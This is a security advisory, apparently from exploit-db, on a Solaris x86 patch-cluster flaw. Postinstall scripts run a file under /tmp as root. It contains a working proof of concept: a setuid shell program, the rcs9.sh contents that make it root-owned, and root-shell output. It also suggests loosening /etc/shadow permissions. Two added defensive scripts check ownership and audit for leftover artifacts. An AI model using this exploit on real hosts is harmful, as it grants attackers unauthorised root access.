Solaris Recommended Patch Cluster 6/19 (x86) – Local Privilege Escalation

  • Author: Larry W. Cashdollar
    Date: 2013-07-09
  • Source: https://www.exploit-db.com/exploits/26709/
  • Solaris Recommended Patch Cluster 6/19 local root on x86
    
    Larry W. Cashdollar
    7/3/2013
    @_larry0
    
    If the system administrator updates the system using Update Manager or smpatch in multi-user mode, a local user can execute commands as root. This only affects x86 systems, as the code in question sits under a case statement that checks that the platform is Intel-based.
    
    Local root:
    
    Write /tmp/diskette_rc.d/rcs9.sh before the postinstall script runs and your commands are executed as root.
    
    ./144751-01/SUNWos86r/install/postinstall
    
    
    782 if [ -s /tmp/diskette_rc.d/rcs9.sh ]
    783 then
    784     /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
    785 fi
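    The fragment above runs whatever sits at a path under /tmp as root, guarded only by `[ -s ... ]`, which tests for a non-empty file and nothing else. The following is an added example, not Oracle's postinstall code and not part of the advisory, of the checks a privileged installer should make before executing a helper from a location an unprivileged user can pre-create. The function names `safe_helper_ok` and `run_helper_if_safe` are this example's own; plain `sh` stands in for the `/sbin/sh` the real script uses, and the OWNER parameter exists only so the check can be exercised by a non-root user.

```sh
#!/bin/sh
# Added example (not Oracle's postinstall code): ownership and permission
# checks a privileged installer should make before executing a helper script
# from a location an unprivileged user may be able to pre-create.
#
# safe_helper_ok PATH [OWNER] returns 0 only if PATH is a regular file (not a
# symlink) owned by OWNER, and neither PATH nor its directory is group- or
# world-writable.  OWNER defaults to root.  Only POSIX find primaries are used.
safe_helper_ok() {
    f=$1
    owner=${2:-root}
    d=$(dirname "$f")

    # find without -L does not follow symlinks, so a symlink planted at $f
    # fails -type f.  -perm -002 / -perm -020 match if that write bit is set.
    ok=$(find "$f" -prune -type f -user "$owner" ! \( -perm -002 -o -perm -020 \) -print 2>/dev/null)
    [ -n "$ok" ] || return 1

    # The directory holding the helper must be equally protected, otherwise the
    # file can be swapped between this check and the run.  A directory created
    # by an unprivileged user under /tmp fails the owner test; /tmp itself
    # (mode 1777) fails the world-writable test.
    ok=$(find "$d" -prune -type d -user "$owner" ! \( -perm -002 -o -perm -020 \) -print 2>/dev/null)
    [ -n "$ok" ] || return 1
}

# run_helper_if_safe PATH [OWNER]: run "sh PATH post" only after the checks
# pass.  Returns 2 when the helper is refused, otherwise the helper's exit
# status.  (The real script calls /sbin/sh; plain sh is used here so the
# example runs on any POSIX system.)
run_helper_if_safe() {
    if safe_helper_ok "$1" "$2"; then
        sh "$1" post
    else
        echo "refusing to run $1: not an owner-only, ${2:-root}-owned regular file" >&2
        return 2
    fi
}

# Usage: sh helper_check.sh /tmp/diskette_rc.d/rcs9.sh [owner]
if [ $# -gt 0 ]; then
    run_helper_if_safe "$1" "$2"
fi
```

    Note that the check still leaves a window if the helper lives in a directory the installer does not control; the durable fix is to keep such helpers in a root-owned directory outside /tmp altogether, and the checks then simply confirm that invariant.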
    
    Inject entries into driver_aliases? Research the config file; maybe we can load our own library/driver?
    
    804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs)
    805 TMPFILE=/tmp/ncrstmp
    806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driver_aliases >$TMPFILE
    807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases
    
    
    ./141445-09/SUNWos86r/install/postinstall
    
    
    656 if [ -s /tmp/diskette_rc.d/rcs9.sh ]
    657 then
    658     /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
    659 fi
    
    
    Well, it looks like you've got a few chances to abuse it:
    
    
    larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \;
    ./144501-19/SUNWos86r/install/postinstall
    ./141445-09/SUNWos86r/install/postinstall
    ./142059-01/SUNWos86r/install/postinstall
    ./147148-26/SUNWos86r/install/postinstall
    ./127128-11/SUNWos86r/install/postinstall
    ./148889-03/SUNWos86r/install/postinstall
    ./142910-17/SUNWos86r/install/postinstall
    ./144751-01/SUNWos86r/install/postinstall
    
    Pseudo PoC:
    
    Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry.
    
    chmod 666 /etc/shadow would be easy.
    
    PoC:
    
    larry@slowaris:~$ cat setuid.c 
    #include <stdio.h>
    #include <unistd.h>     /* setregid, setreuid, execve */
    
    /* Once this binary is root-owned and setuid (done by rcs9.sh below),
     * it drops the caller into a root shell. */
    int
    main (void)
    {
        char *shell[2];
        shell[0] = "sh";
        shell[1] = NULL;
        setregid (0, 0);
        setreuid (0, 0);
        execve ("/bin/sh", shell, NULL);
        return (0);
    }
    
    gcc -o /tmp/r00t setuid.c
    
    larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh
    chown root:root /tmp/r00t
    chmod +s /tmp/r00t
    
    After patches have been applied:
    
    larry@slowaris:~$ /tmp/r00t
    # id
    uid=0(root) gid=0(root)
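    The sequence above leaves two artifacts on the host: a root-owned setuid binary under /tmp and, in the simpler variant, /etc/shadow with loosened permissions. The following is an added example, not part of the advisory, of a post-patch audit that looks for both. The function names `setuid_setgid_files`, `loosened_files` and `post_patch_audit` are this example's own; the paths are parameters so the functions can be run against a constructed tree, and with no arguments they fall back to /tmp, /var/tmp and /etc/shadow.

```sh
#!/bin/sh
# Added example (not part of the advisory): audit a multi-user host after a
# patch cluster has been applied for the artifacts a planted rcs9.sh leaves.

# setuid_setgid_files DIR...: print regular files carrying the setuid or
# setgid bit under DIR... (nothing under a temp directory should carry either).
setuid_setgid_files() {
    [ $# -gt 0 ] || set -- /tmp /var/tmp
    find "$@" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# loosened_files FILE...: print each existing FILE that is readable or
# writable by group or others.  The shadow file is expected to be owner-only.
loosened_files() {
    [ $# -gt 0 ] || set -- /etc/shadow
    for f in "$@"; do
        [ -e "$f" ] || continue
        find "$f" -prune \( -perm -040 -o -perm -020 -o -perm -004 -o -perm -002 \) -print 2>/dev/null
    done
}

# post_patch_audit [TMPDIR [SHADOWFILE]]: run both checks, print each finding
# with a fixed prefix so a log collector can key on it, and return 1 if
# anything was found, 0 if clean.
post_patch_audit() {
    tmpdir=${1:-/tmp}
    shadow=${2:-/etc/shadow}
    found=0

    out=$(setuid_setgid_files "$tmpdir")
    if [ -n "$out" ]; then
        printf '%s\n' "$out" | sed 's/^/SUID-IN-TMP /'
        found=1
    fi

    out=$(loosened_files "$shadow")
    if [ -n "$out" ]; then
        printf '%s\n' "$out" | sed 's/^/LOOSE-PERMS /'
        found=1
    fi

    return $found
}

# Usage: sh post_patch_audit.sh [tmpdir] [shadowfile]
if [ $# -gt 0 ]; then
    post_patch_audit "$1" "$2"
fi
```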